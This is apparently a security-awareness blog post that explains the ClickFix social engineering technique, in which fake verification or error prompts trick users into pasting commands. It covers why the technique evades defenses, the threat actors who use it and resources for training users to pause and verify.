The Copy-Paste Attack That’s Spreading Quietly

What is ClickFix?

ClickFix is a social engineering technique where an attacker convinces you to run a command or paste code on your device. The prompt often appears as a CAPTCHA, a verification step, or a “fix this error” message. The user executes the command themselves, which triggers malware or gives the attacker access.

🧩 How It Works

1. A victim receives a phishing email, clicks on a malicious ad, or visits a compromised website.
2. The site displays a fake “You must verify you are human” or “Fix this error” prompt.
3. The victim is instructed to open Run (Win+R) or Terminal, paste a command, and press Enter.
4. The pasted command executes malware or loads further stages (infostealer, RAT, loader).
5. Because the user initiated the action, many automated defenses are bypassed.

🚨 Why It Matters

ClickFix is important because it marks a shift in how attackers operate. Instead of relying solely on software vulnerabilities or attachments, they are exploiting the most consistent weakness of all: the user.

When you are told to “paste this code” as part of what looks like a normal workflow, you become the delivery mechanism.

This method is particularly dangerous because:

• Many security tools assume the threat comes from outside. With ClickFix, the user triggers it, making detection much harder.
• It works on both Windows and macOS, putting a wide range of users, including less technical ones, at risk.
• In sectors like hospitality, small businesses, and service industries—where cybersecurity resources are often limited—these user-based attacks can go unnoticed.

The future of cyber defense must include not only technology but also behavioral hygiene, teaching people that sometimes the act of clicking or pasting itself can be the threat.

🛡️ How to Protect Yourself Against ClickFix?

❓ Other Questions People Ask

1. Is ClickFix a virus, or is it malware?

ClickFix is neither. It is a social engineering tactic. It is the delivery method or the “con.” It represents the psychological tricks (the visual lure) used to convince a user to manually run malicious commands on their own computer. These commands, once run by the user, then proceed to download the actual malware (such as infostealers, Remote Access Trojans (RATs), or ransomware).

2. Does it only affect Windows?

While Windows is a primary target, attackers are also adapting the technique for macOS.

3. Can my antivirus or EDR solution automatically block ClickFix?

Not reliably, as ClickFix is designed to bypass these tools. The attack bypasses traditional file-scanning AV because it is often “fileless” (executing only in memory). It can bypass many EDR solutions because the user is the one performing the malicious action (bypassing “human intervention” checks) , and they are using trusted, legitimate system utilities (like PowerShell) to do it.

4. Why is this technique rising now?

Because it leverages human behavior rather than strict technical vulnerabilities, making it scalable and effective for attackers.

5. How can organizations respond?

By shaping both technical controls (restricting Run/Terminal) and behavioral controls (training staff, building pause culture).

6. Who are the main threat actors using ClickFix?

The tactic is used by a very broad spectrum of actors, which is why it is so dangerous.

Cybercriminals: It was pioneered by financially motivated groups, specifically the initial access broker TA571 and the ClearFake cluster. It is now widely used by countless criminal actors to deploy commodity malware like the Lumma Stealer.

State-Sponsored (APT) Groups: In a major strategic escalation, ClickFix has been adopted by nation-state espionage groups. Researchers have confirmed its use by APTs linked to North Korea (TA427), Iran (TA450, MuddyWater), and Russia (APT28, TA422).

🧰 What Resources Are Available to Help?

📚Books

Social Engineering by Robert W. Gehl & Sean T. Lawson

Phishing for Phools by George A. Akerlof

🎙️ Podcasts

Hacking Humans (by the CyberWire) hosted by Dave Bittner, Joe Carrigan and Maria Varmazis

Human Factor Security by Jenny Radcliffe

▶️ Video

AI ClickFix: Hijacking Computer-Use Agents with popular social engineering tricks, like ClickFix. By Embrace The Red

🧠 Final Thoughts

The ClickFix attack makes it clear that in 2025, the human element is the main battleground. Technology alone is not enough to stop these threats; the most effective, and often only, defense is teaching people to pause, question, and verify.

Attackers using methods like ClickFix exploit human actions, not just software vulnerabilities. That means the best defense combines technology with behavior. While having the right tools is important, building a culture where the team automatically follows a “stop, question, verify” mindset is just as critical as the latest endpoint protection.

Ultimately, the strongest defense is one that recognizes the user as both the target and the essential front-line defender.